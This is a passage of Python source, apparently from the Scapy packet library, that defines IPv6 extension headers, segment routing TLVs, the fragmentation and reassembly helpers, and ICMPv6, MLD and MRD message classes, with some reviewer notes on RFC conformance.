        """Return the length of the built options, padding included."""
        built = self.i2m(pkt, i)
        return len(built)

    @staticmethod
    def _pad_bytes(count):
        """Build the padding option(s) filling exactly ``count`` bytes."""
        if count == 1:
            return raw(Pad1())
        if count != 0:
            # PadN carries a 2-byte header, hence the shorter data part
            return raw(PadN(optdata=b'\x00' * (count - 2)))
        return b""

    def i2m(self, pkt, x):
        """Build the options list ``x``, inserting padding when enabled.

        When the 'autopad' value of ``pkt`` is false, the options are
        simply concatenated. Otherwise each option is preceded by the
        padding its ``alignment_delta()`` asks for, and trailing padding
        brings the final position to a multiple of 8.
        """
        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            # No usable 'autopad' attribute: behave as if it were enabled
            autopad = 1

        if not autopad:
            return b"".join(map(bytes, x))

        offset = self.curpos
        chunks = []
        for opt in x:
            gap = opt.alignment_delta(offset)
            chunks.append(self._pad_bytes(gap))
            built = raw(opt)
            chunks.append(built)
            offset += gap + len(built)

        # Let's make the class including our option field
        # a multiple of 8 octets long
        chunks.append(self._pad_bytes(-offset % 8))
        return b"".join(chunks)

    def addfield(self, pkt, s, val):
        """Append the built (and possibly padded) options to ``s``."""
        return s + self.i2m(pkt, val)
930
931
class _PhantomAutoPadField(ByteField):
    # Field that exists on the packet object only: nothing is written when
    # building and nothing is consumed when dissecting.

    def addfield(self, pkt, s, val):
        """Leave the built string ``s`` untouched."""
        return s

    def getfield(self, pkt, s):
        """Consume nothing from ``s`` and report the value 1."""
        return s, 1

    def i2repr(self, pkt, x):
        """Render the value as "On" or "Off"."""
        return "On" if x else "Off"
943
944
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Hop-by-Hop Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # 'len' is expressed in 8-byte units, not counting the first 8 bytes;
        # the 2 added bytes account for the 'nh' and 'len' fields themselves
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: (8 * (pkt.len + 1)) - 2),
    ]
    overload_fields = {IPv6: {"nh": 0}}
954
955
956#                        Destination Option Header                          #
957
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Destination Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # 'len' is expressed in 8-byte units, not counting the first 8 bytes;
        # the 2 added bytes account for the 'nh' and 'len' fields themselves
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: (8 * (pkt.len + 1)) - 2),
    ]
    overload_fields = {IPv6: {"nh": 60}}
967
968
969#                             Routing Header                                #
970
class IPv6ExtHdrRouting(_IPv6ExtHdr):
    name = "IPv6 Option Header Routing"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # in 8 bytes blocks: each 16-byte address counts for two
        FieldLenField("len", None, count_of="addresses", fmt="B",
                      adjust=lambda pkt, x:2 * x),
        ByteField("type", 0),
        ByteField("segleft", None),
        BitField("reserved", 0, 32),  # There is meaning in this field ...
        IP6ListField("addresses", [],
                     length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Fill in 'segleft' with the number of addresses when left unset."""
        if self.segleft is None:
            # 'segleft' is the fourth byte of the built header
            segleft = struct.pack("B", len(self.addresses))
            pkt = b"".join((pkt[:3], segleft, pkt[4:]))
        return _IPv6ExtHdr.post_build(self, pkt, pay)
987
988
989#                         Segment Routing Header                            #
990
991# This implementation is based on RFC8754, but some older snippets come from:
992# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
993
994_segment_routing_header_tlvs = {
995    # RFC 8754 sect 8.2
996    0: "Pad1 TLV",
997    1: "Ingress Node TLV",  # draft 06
998    2: "Egress Node TLV",  # draft 06
999    4: "PadN TLV",
1000    5: "HMAC TLV",
1001}
1002
1003
class IPv6ExtHdrSegmentRoutingTLV(Packet):
    name = "IPv6 Option Header Segment Routing - Generic TLV"
    # RFC 8754 sect 2.1
    fields_desc = [
        ByteEnumField("type", None, _segment_routing_header_tlvs),
        ByteField("len", 0),
        StrLenField("value", "", length_from=lambda pkt: pkt.len),
    ]

    # Registry shared with the subclasses: default 'type' value -> TLV class
    registered_sr_tlv = {}

    @classmethod
    def register_variant(cls):
        """Record ``cls`` in the registry under its default 'type' value."""
        cls.registered_sr_tlv[cls.type.default] = cls

    @classmethod
    def dispatch_hook(cls, pkt=None, *args, **kargs):
        """Select the TLV class registered for the first byte of ``pkt``.

        Falls back to ``cls`` when ``pkt`` is empty or missing, or when no
        class is registered for that type.
        """
        if not pkt:
            return cls
        tlv_type = ord(pkt[:1])
        return cls.registered_sr_tlv.get(tlv_type, cls)

    def extract_padding(self, p):
        """Return an empty payload and hand every remaining byte back."""
        payload, remaining = b"", p
        return payload, remaining
1026
1027
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
    # draft-ietf-6man-segment-routing-header-06 3.1.1
    fields_desc = [
        ByteEnumField("type", 1, _segment_routing_header_tlvs),
        # 18 = reserved (1) + flags (1) + IPv6 address (16)
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("ingress_node", "::1"),
    ]
1036
1037
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - Egress Node TLV"
    # draft-ietf-6man-segment-routing-header-06 3.1.2
    fields_desc = [
        ByteEnumField("type", 2, _segment_routing_header_tlvs),
        # 18 = reserved (1) + flags (1) + IPv6 address (16)
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("egress_node", "::1"),
    ]
1046
1047
class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - Pad1 TLV"
    # RFC8754 sect 2.1.1.1
    # NOTE(review): with these defaults the TLV is built as three bytes
    # (type, len, one padding byte), whereas RFC 8754 appears to define
    # Pad1 as a single Type byte - confirm before relying on it for padding.
    fields_desc = [
        ByteEnumField("type", 0, _segment_routing_header_tlvs),
        FieldLenField("len", None, length_of="padding", fmt="B"),
        StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len),
    ]
1054
1055
class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - PadN TLV"
    # RFC8754 sect 2.1.1.2
    fields_desc = [
        ByteEnumField("type", 4, _segment_routing_header_tlvs),
        # 'len' is computed from the size of 'padding' when left unset
        FieldLenField("len", None, length_of="padding", fmt="B"),
        StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len),
    ]
1062
1063
class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - HMAC TLV"
    # RFC8754 sect 2.1.2
    # The TLV length is a single byte, like in every other SRH TLV, and is
    # expressed in bytes. It covers everything that follows it: 'D' and
    # 'reserved' (2 bytes), 'hmackeyid' (4 bytes), then the HMAC itself.
    fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
                   FieldLenField("len", None, length_of="hmac", fmt="B",
                                 adjust=lambda _, x: x + 6),
                   BitField("D", 0, 1),
                   BitField("reserved", 0, 15),
                   IntField("hmackeyid", 0),
                   # Clamp to 0 so that a bogus 'len' smaller than the fixed
                   # part cannot turn into a negative slice length
                   StrLenField("hmac", "",
                               length_from=lambda pkt: max(pkt.len - 6, 0))]
1075
1076
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
    name = "IPv6 Option Header Segment Routing"
    # RFC8754 sect 2. + flag bits from draft 06
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteField("type", 4),
                   ByteField("segleft", None),
                   ByteField("lastentry", None),
                   BitField("unused1", 0, 1),
                   BitField("protected", 0, 1),
                   BitField("oam", 0, 1),
                   BitField("alert", 0, 1),
                   BitField("hmac", 0, 1),
                   BitField("unused2", 0, 3),
                   ShortField("tag", 0),
                   IP6ListField("addresses", ["::1"],
                                count_from=lambda pkt: (pkt.lastentry + 1)),
                   # TLVs fill what is left of the header once the 16-byte
                   # addresses are removed ('len' is in 8-byte units)
                   PacketListField("tlv_objects", [],
                                   IPv6ExtHdrSegmentRoutingTLV,
                                   length_from=lambda pkt: 8 * pkt.len - 16 * (
                                       pkt.lastentry + 1
                   ))]

    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Fill in the 'len', 'segleft' and 'lastentry' fields left unset.

        When 'len' is unset, the header is first padded up to a multiple of
        8 bytes and 'len' is then computed in 8-byte units, not counting the
        first 8 bytes. 'segleft' and 'lastentry' both default to the index
        of the last address (0 when the list is empty).
        """

        if self.len is None:

            # The extension must be aligned on 8 bytes
            tmp_mod = -len(pkt) % 8
            if tmp_mod == 1:
                # A single missing byte is filled with a Pad1 TLV, i.e. one
                # zero Type byte (RFC 8754 sect 2.1.1.1). Building
                # IPv6ExtHdrSegmentRoutingTLVPad1() here would append three
                # bytes and leave the header misaligned.
                pkt += b"\x00"
            elif tmp_mod >= 2:
                # Add the padding extension: 2 bytes of TLV header, then
                # as many zero bytes as needed
                tmp_pad = b"\x00" * (tmp_mod - 2)
                tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
                pkt += raw(tlv)

            tmp_len = (len(pkt) - 8) // 8
            pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]

        if self.segleft is None:
            tmp_len = len(self.addresses)
            if tmp_len:
                tmp_len -= 1
            pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]

        if self.lastentry is None:
            lastentry = len(self.addresses)
            if lastentry == 0:
                warning(
                    "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
                )
            else:
                lastentry -= 1
            pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]

        return _IPv6ExtHdr.post_build(self, pkt, pay)
1137
1138
1139#                           Fragmentation Header                             #
1140
class IPv6ExtHdrFragment(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        BitField("res1", 0, 8),
        # 13-bit offset, 2 reserved bits and the 'm' flag share 16 bits
        BitField("offset", 0, 13),
        BitField("res2", 0, 2),
        BitField("m", 0, 1),
        IntField("id", None),
    ]
    overload_fields = {IPv6: {"nh": 44}}

    def guess_payload_class(self, p):
        """Return Raw for non-first fragments, else defer to the parent."""
        if self.offset > 0:
            return Raw
        return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
1156
1157
def defragment6(packets):
    """
    Performs defragmentation of a list of IPv6 packets. Packets are reordered.
    Crap is dropped. What lacks is completed by 'X' characters.

    Only the fragments sharing the identification of the first fragment found
    are used; the others are dropped with a warning.

    :param packets: iterable of packets, fragments or not
    :return: the reassembled packet, or an empty list when 'packets' holds no
        fragment at all
    """

    # Remove non fragments
    lst = [x for x in packets if IPv6ExtHdrFragment in x]
    if not lst:
        return []

    frag_id = lst[0][IPv6ExtHdrFragment].id

    llen = len(lst)
    lst = [x for x in lst if x[IPv6ExtHdrFragment].id == frag_id]
    if len(lst) != llen:
        warning("defragment6: some fragmented packets have been removed from list")  # noqa: E501

    # Reorder fragments by increasing offset. sorted() is stable, so
    # fragments sharing the same offset keep their relative order.
    res = sorted(lst, key=lambda x: x[IPv6ExtHdrFragment].offset)

    # regenerate the fragmentable part
    fragmentable = b""
    for p in res:
        q = p[IPv6ExtHdrFragment]
        offset = 8 * q.offset  # the offset field counts 8-byte units
        if offset != len(fragmentable):
            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))  # noqa: E501
        # A negative count (fragment starting before the current end)
        # simply adds nothing
        fragmentable += b"X" * (offset - len(fragmentable))
        fragmentable += raw(q.payload)

    # Regenerate the unfragmentable part.
    q = res[0].copy()
    nh = q[IPv6ExtHdrFragment].nh
    # The layer preceding the fragment header now announces the reassembled
    # payload directly
    q[IPv6ExtHdrFragment].underlayer.nh = nh
    q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
    del q[IPv6ExtHdrFragment].underlayer.payload
    q /= conf.raw_layer(load=fragmentable)
    del q.plen

    # Build and dissect again so that the payload is decoded as real layers
    if q[IPv6].underlayer:
        q[IPv6] = IPv6(raw(q[IPv6]))
    else:
        q = IPv6(raw(q))
    return q
1213
1214
def fragment6(pkt, fragSize):
    """
    Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
    expected maximum size of fragment data (MTU). The list of packets is
    returned.

    If packet does not contain an IPv6ExtHdrFragment class, it is added to
    first IPv6 layer found. If no IPv6 layer exists packet is returned in
    result list unmodified.

    The work is done on a copy of 'pkt'. An empty list is returned when the
    part starting at the fragment header is bigger than 65535 bytes. When
    'fragSize' is too low to fit any data, a warning is emitted and a single
    unfragmented packet is returned.
    """

    pkt = pkt.copy()

    if IPv6ExtHdrFragment not in pkt:
        if IPv6 not in pkt:
            return [pkt]

        # Insert a fragment header right after the first IPv6 layer
        layer3 = pkt[IPv6]
        data = layer3.payload
        frag = IPv6ExtHdrFragment(nh=layer3.nh)

        layer3.remove_payload()
        # Let 'nh' and 'plen' be computed again at build time
        del layer3.nh
        del layer3.plen

        frag.add_payload(data)
        layer3.add_payload(frag)

    # If the payload is bigger than 65535, a Jumbo payload must be used, as
    # an IPv6 packet can't be bigger than 65535 bytes.
    if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
        warning("An IPv6 packet can't be bigger than 65535, please use a Jumbo payload.")  # noqa: E501
        return []

    s = raw(pkt)  # for instantiation to get upper layer checksum right

    if len(s) <= fragSize:
        return [pkt]

    # Fragmentable part : fake IPv6 for Fragmentable part length computation
    fragPart = pkt[IPv6ExtHdrFragment].payload
    tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
    fragPartLen = len(tmp) - 40  # basic IPv6 header length
    fragPartStr = s[-fragPartLen:]

    # Grab Next Header for use in Fragment Header
    nh = pkt[IPv6ExtHdrFragment].nh

    # Keep fragment header
    fragHeader = pkt[IPv6ExtHdrFragment]
    del fragHeader.payload  # detach payload

    # Unfragmentable Part (8 is the size of the fragment header)
    unfragPartLen = len(s) - fragPartLen - 8
    unfragPart = pkt
    del pkt[IPv6ExtHdrFragment].underlayer.payload  # detach payload

    # Cut the fragmentable part to fit fragSize. Inner fragments have
    # a length that is an integer multiple of 8 octets. last Frag MTU
    # can be anything below MTU
    lastFragSize = fragSize - unfragPartLen - 8
    innerFragSize = lastFragSize - (lastFragSize % 8)

    if lastFragSize <= 0 or innerFragSize == 0:
        warning("Provided fragment size value is too low. " +
                "Should be more than %d" % (unfragPartLen + 8))
        return [unfragPart / fragHeader / fragPart]

    remain = fragPartStr
    res = []
    fragOffset = 0     # offset, incremented during creation
    fragId = random.randint(0, 0xffffffff)  # random id ...
    if fragHeader.id is not None:  # ... except id provided by user
        fragId = fragHeader.id
    fragHeader.m = 1
    fragHeader.id = fragId
    fragHeader.nh = nh

    # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
    while True:
        if (len(remain) > lastFragSize):
            # Inner fragment: take a multiple of 8 bytes, more will follow
            tmp = remain[:innerFragSize]
            remain = remain[innerFragSize:]
            fragHeader.offset = fragOffset    # update offset
            fragOffset += (innerFragSize // 8)  # compute new one
            if IPv6 in unfragPart:
                unfragPart[IPv6].plen = None
            tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
            res.append(tempo)
        else:
            # Last fragment: carries whatever is left, 'm' flag cleared
            fragHeader.offset = fragOffset    # update offset
            fragHeader.m = 0
            if IPv6 in unfragPart:
                unfragPart[IPv6].plen = None
            tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
            res.append(tempo)
            break
    return res
1313
1314
1315#############################################################################
1316#############################################################################
1317#                             ICMPv6* Classes                               #
1318#############################################################################
1319#############################################################################
1320
1321
# ICMPv6 type value -> name of the class implementing that message
icmp6typescls = {
    1: "ICMPv6DestUnreach",
    2: "ICMPv6PacketTooBig",
    3: "ICMPv6TimeExceeded",
    4: "ICMPv6ParamProblem",
    128: "ICMPv6EchoRequest",
    129: "ICMPv6EchoReply",
    130: "ICMPv6MLQuery",  # MLDv1 or MLDv2
    131: "ICMPv6MLReport",
    132: "ICMPv6MLDone",
    133: "ICMPv6ND_RS",
    134: "ICMPv6ND_RA",
    135: "ICMPv6ND_NS",
    136: "ICMPv6ND_NA",
    137: "ICMPv6ND_Redirect",
    # 138: Do Me - RFC 2894 - Seems painful
    139: "ICMPv6NIQuery",
    140: "ICMPv6NIReply",
    141: "ICMPv6ND_INDSol",
    142: "ICMPv6ND_INDAdv",
    143: "ICMPv6MLReport2",
    144: "ICMPv6HAADRequest",
    145: "ICMPv6HAADReply",
    146: "ICMPv6MPSol",
    147: "ICMPv6MPAdv",
    # 148: Do Me - SEND related - RFC 3971
    # 149: Do Me - SEND related - RFC 3971
    151: "ICMPv6MRD_Advertisement",
    152: "ICMPv6MRD_Solicitation",
    153: "ICMPv6MRD_Termination",
    # 154: Do Me - FMIPv6 Messages - RFC 5568
    155: "ICMPv6RPL",  # RFC 6550
}
1354
1355icmp6typesminhdrlen = {1: 8,
1356                       2: 8,
1357                       3: 8,
1358                       4: 8,
1359                       128: 8,
1360                       129: 8,
1361                       130: 24,
1362                       131: 24,
1363                       132: 24,
1364                       133: 8,
1365                       134: 16,
1366                       135: 24,
1367                       136: 24,
1368                       137: 40,
1369                       # 139:
1370                       # 140
1371                       141: 8,
1372                       142: 8,
1373                       143: 8,
1374                       144: 8,
1375                       145: 8,
1376                       146: 8,
1377                       147: 8,
1378                       151: 8,
1379                       152: 4,
1380                       153: 4,
1381                       155: 4
1382                       }
1383
# ICMPv6 type value -> human readable name of the message
icmp6types = {
    1: "Destination unreachable",
    2: "Packet too big",
    3: "Time exceeded",
    4: "Parameter problem",
    100: "Private Experimentation",
    101: "Private Experimentation",
    128: "Echo Request",
    129: "Echo Reply",
    130: "MLD Query",
    131: "MLD Report",
    132: "MLD Done",
    133: "Router Solicitation",
    134: "Router Advertisement",
    135: "Neighbor Solicitation",
    136: "Neighbor Advertisement",
    137: "Redirect Message",
    138: "Router Renumbering",
    139: "ICMP Node Information Query",
    140: "ICMP Node Information Response",
    141: "Inverse Neighbor Discovery Solicitation Message",
    142: "Inverse Neighbor Discovery Advertisement Message",
    143: "MLD Report Version 2",
    144: "Home Agent Address Discovery Request Message",
    145: "Home Agent Address Discovery Reply Message",
    146: "Mobile Prefix Solicitation",
    147: "Mobile Prefix Advertisement",
    148: "Certification Path Solicitation",
    149: "Certification Path Advertisement",
    151: "Multicast Router Advertisement",
    152: "Multicast Router Solicitation",
    153: "Multicast Router Termination",
    155: "RPL Control Message",
    200: "Private Experimentation",
    201: "Private Experimentation",
}
1418
1419
class _ICMPv6(Packet):
    name = "ICMPv6 dummy class"
    overload_fields = {IPv6: {"nh": 58}}

    def post_build(self, p, pay):
        """Append the payload and fill in the checksum when it is unset."""
        p += pay
        if self.cksum is not None:
            return p
        # The checksum sits in bytes 2 and 3 of the message
        chksum = in6_chksum(58, self.underlayer, p)
        return p[:2] + struct.pack("!H", chksum) + p[4:]

    def hashret(self):
        """Delegate to the payload."""
        return self.payload.hashret()

    def answers(self, other):
        """Return 1 when type and code match those of ``other``, else 0.

        The comparison only takes place when the underlayer is an IPerror6,
        or when it is an extension header and ``other`` is an ICMPv6
        message.
        """
        under = self.underlayer
        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
        eligible = (isinstance(under, IPerror6) or
                    (isinstance(under, _IPv6ExtHdr) and
                     isinstance(other, _ICMPv6)))
        if not eligible:
            return 0
        if self.type == other.type and self.code == other.code:
            return 1
        return 0
1444
1445
class _ICMPv6Error(_ICMPv6):
    name = "ICMPv6 errors dummy class"

    def guess_payload_class(self, p):
        """Always dissect what follows as an IPerror6."""
        return IPerror6
1451
1452
class ICMPv6Unknown(_ICMPv6):
    name = "Scapy6 ICMPv6 fallback class"
    fields_desc = [
        ByteEnumField("type", 1, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        # Whatever follows the common ICMPv6 header is kept as is
        StrField("msgbody", ""),
    ]
1459
1460
1461#                                  RFC 2460                                  #
1462
class ICMPv6DestUnreach(_ICMPv6Error):
    name = "ICMPv6 Destination Unreachable"
    fields_desc = [
        ByteEnumField("type", 1, icmp6types),
        ByteEnumField("code", 0, {
            0: "No route to destination",
            1: "Communication with destination administratively prohibited",
            2: "Beyond scope of source address",
            3: "Address unreachable",
            4: "Port unreachable",
        }),
        XShortField("cksum", None),
        ByteField("length", 0),
        X3BytesField("unused", 0),
        _ICMPExtensionPadField(),
        _ICMPExtensionField(),
    ]
    post_dissection = _ICMP_extpad_post_dissection
1477
1478
class ICMPv6PacketTooBig(_ICMPv6Error):
    name = "ICMPv6 Packet Too Big"
    fields_desc = [
        ByteEnumField("type", 2, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("mtu", 1280),
    ]
1485
1486
class ICMPv6TimeExceeded(_ICMPv6Error):
    name = "ICMPv6 Time Exceeded"
    fields_desc = [
        ByteEnumField("type", 3, icmp6types),
        ByteEnumField("code", 0, {
            0: "hop limit exceeded in transit",
            1: "fragment reassembly time exceeded",
        }),
        XShortField("cksum", None),
        ByteField("length", 0),
        X3BytesField("unused", 0),
        _ICMPExtensionPadField(),
        _ICMPExtensionField(),
    ]
    post_dissection = _ICMP_extpad_post_dissection
1498
1499
1500# The default pointer value is set to the next header field of
1501# the encapsulated IPv6 packet
1502
1503
class ICMPv6ParamProblem(_ICMPv6Error):
    name = "ICMPv6 Parameter Problem"
    fields_desc = [
        ByteEnumField("type", 4, icmp6types),
        ByteEnumField("code", 0, {
            0: "erroneous header field encountered",
            1: "unrecognized Next Header type encountered",
            2: "unrecognized IPv6 option encountered",
            3: "first fragment has incomplete header chain",
        }),
        XShortField("cksum", None),
        # Byte 6 of an IPv6 header is its next header field
        IntField("ptr", 6),
    ]
1515
1516
class ICMPv6EchoRequest(_ICMPv6):
    name = "ICMPv6 Echo Request"
    fields_desc = [
        ByteEnumField("type", 128, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", 0),
        XShortField("seq", 0),
        StrField("data", ""),
    ]

    def mysummary(self):
        """Summarize the message with its name, id and sequence number."""
        return self.sprintf("%name% (id: %id% seq: %seq%)")

    def hashret(self):
        """Prefix the payload hash with the packed id and sequence number."""
        id_and_seq = struct.pack("HH", self.id, self.seq)
        return id_and_seq + self.payload.hashret()
1531
1532
class ICMPv6EchoReply(ICMPv6EchoRequest):
    name = "ICMPv6 Echo Reply"
    type = 129

    def answers(self, other):
        """Tell whether this reply matches the echo request ``other``.

        The id, the sequence number and the data must all be equal.
        """
        if not isinstance(other, ICMPv6EchoRequest):
            return False
        same_exchange = self.id == other.id and self.seq == other.seq
        return same_exchange and self.data == other.data
1542
1543
1544#            ICMPv6 Multicast Listener Discovery (RFC2710)                  #
1545
# All MLD messages are sent with a link-local source address
# -> Take care of it in post_build if none is specified
# The Hop-Limit value must be 1
1549# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1550# header. (The router alert option is necessary to cause routers to
1551# examine MLD messages sent to multicast addresses in which the router
1552# itself has no interest"
class _ICMPv6ML(_ICMPv6):
    # Fields shared by the MLD messages built on top of this class
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 0),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
    ]
1560
1561# general queries are sent to the link-scope all-nodes multicast
1562# address ff02::1, with a multicast address field of 0 and a MRD of
1563# [Query Response Interval]
1564# Default value for mladdr is set to 0 for a General Query, and
1565# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
#        Option in a Hop-by-Hop Options Header.
1568
1569
class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
    name = "MLD - Multicast Listener Query"
    # Defaults overriding those of the inherited fields
    type = 130
    mrd = 10000  # 10s for mrd
    mladdr = "::"
    overload_fields = {
        IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58},
    }
1576
1577
# TODO : See what we can do to automatically include a Router Alert
#        Option in a Hop-by-Hop Options Header.
class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
    name = "MLD - Multicast Listener Report"
    type = 131
    overload_fields = {
        IPv6: {"hlim": 1, "nh": 58},
    }

    def answers(self, query):
        """Tell whether ``query`` contains a Multicast Listener Query"""
        contains_query = ICMPv6MLQuery in query
        return contains_query
1588
1589# When a node ceases to listen to a multicast address on an interface,
1590# it SHOULD send a single Done message to the link-scope all-routers
1591# multicast address (FF02::2), carrying in its multicast address field
1592# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
#        Option in a Hop-by-Hop Options Header.
1595
1596
class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
    name = "MLD - Multicast Listener Done"
    type = 132
    # Sent by default to ff02::2, with a hop limit of 1
    overload_fields = {
        IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58},
    }
1601
1602
1603#            Multicast Listener Discovery Version 2 (MLDv2) (RFC3810)       #
1604
class ICMPv6MLQuery2(_ICMPv6):  # RFC 3810
    name = "MLDv2 - Multicast Listener Query"
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 10000),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
        # 'Resv', 'S' and 'QRV' share a single byte
        BitField("Resv", 0, 4),
        BitField("S", 0, 1),
        BitField("QRV", 0, 3),
        ByteField("QQIC", 0),
        ShortField("sources_number", None),
        IP6ListField("sources", [],
                     count_from=lambda pkt: pkt.sources_number),
    ]

    # RFC3810 - 4. Message Formats
    overload_fields = {
        IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58},
    }

    def post_build(self, packet, payload):
        """Compute the 'sources_number' field when needed"""
        if self.sources_number is None:
            # 'sources_number' occupies bytes 26 and 27 of the message
            count = struct.pack("!H", len(self.sources))
            packet = b"".join((packet[:26], count, packet[28:]))
        return _ICMPv6.post_build(self, packet, payload)
1630
1631
class ICMPv6MLDMultAddrRec(Packet):
    name = "ICMPv6 MLDv2 - Multicast Address Record"
    fields_desc = [
        ByteField("rtype", 4),
        # NOTE(review): RFC 3810 sect 5.2.6 seems to express Aux Data Len in
        # 32-bit words, whereas this field counts bytes - confirm.
        FieldLenField("auxdata_len", None,
                      length_of="auxdata",
                      fmt="B"),
        # Number of sources: byte length of 'sources' over 16 per address
        FieldLenField("sources_number", None,
                      length_of="sources",
                      adjust=lambda p, num: num // 16),
        IP6Field("dst", "::"),
        IP6ListField("sources", [],
                     length_from=lambda p: 16 * p.sources_number),
        StrLenField("auxdata", "",
                    length_from=lambda p: p.auxdata_len),
    ]

    def default_payload_class(self, packet):
        """Multicast Address Record followed by another one"""
        return type(self)
1650
1651
class ICMPv6MLReport2(_ICMPv6):
    """MLDv2 Multicast Listener Report (RFC 3810), ICMPv6 type 143."""

    name = "MLDv2 - Multicast Listener Report"
    fields_desc = [
        ByteEnumField("type", 143, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
        ShortField("reserved", 0),
        ShortField("records_number", None),
        PacketListField("records", [], ICMPv6MLDMultAddrRec,
                        count_from=lambda report: report.records_number),
    ]

    # RFC 3810 - Message Formats
    overload_fields = {
        IPv6: {
            "dst": "ff02::16",
            "hlim": 1,
            "nh": 58,
        },
    }

    def post_build(self, packet, payload):
        """Fill in 'records_number' when it was left to None.

        The 16-bit counter sits at bytes 6-7 of the built layer and is
        overwritten with the number of entries in 'records'. The result
        is then handed to _ICMPv6.post_build().
        """
        if self.records_number is not None:
            return _ICMPv6.post_build(self, packet, payload)

        count = struct.pack("!H", len(self.records))
        patched = packet[:6] + count + packet[8:]
        return _ICMPv6.post_build(self, patched, payload)

    def answers(self, query):
        """A report answers any MLDv2 query, whatever its content."""
        is_mldv2_query = isinstance(query, ICMPv6MLQuery2)
        return is_mldv2_query
1676
1677
1678#          ICMPv6 MRD - Multicast Router Discovery (RFC 4286)               #
1679
1680# TODO:
1681# - 04/09/06 troglocan : find a way to automatically add a router alert
1682#            option for all MRD packets. This could be done in a specific
1683#            way when IPv6 is the under layer with some specific keyword
1684#            like 'exthdr'. This would allow to keep compatibility with
1685#            providing IPv6 fields to be overloaded in fields_desc.
1686#
1687#            At the moment, if user inserts an IPv6 Router alert option
1688#            none of the IPv6 default values of IPv6 layer will be set.
1689
class ICMPv6MRD_Advertisement(_ICMPv6):
    """Multicast Router Discovery Advertisement, ICMPv6 type 151."""

    name = "ICMPv6 Multicast Router Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 151, icmp6types),
        ByteField("advinter", 20),
        XShortField("cksum", None),
        ShortField("queryint", 0),
        ShortField("robustness", 0),
    ]
    # IPv6 Router Alert requires manual inclusion
    # NOTE(review): RFC 4286 appears to send Advertisements to the
    # All-Snoopers group (ff02::6a) rather than ff02::2 - confirm.
    overload_fields = {
        IPv6: {
            "nh": 58,
            "hlim": 1,
            "dst": "ff02::2",
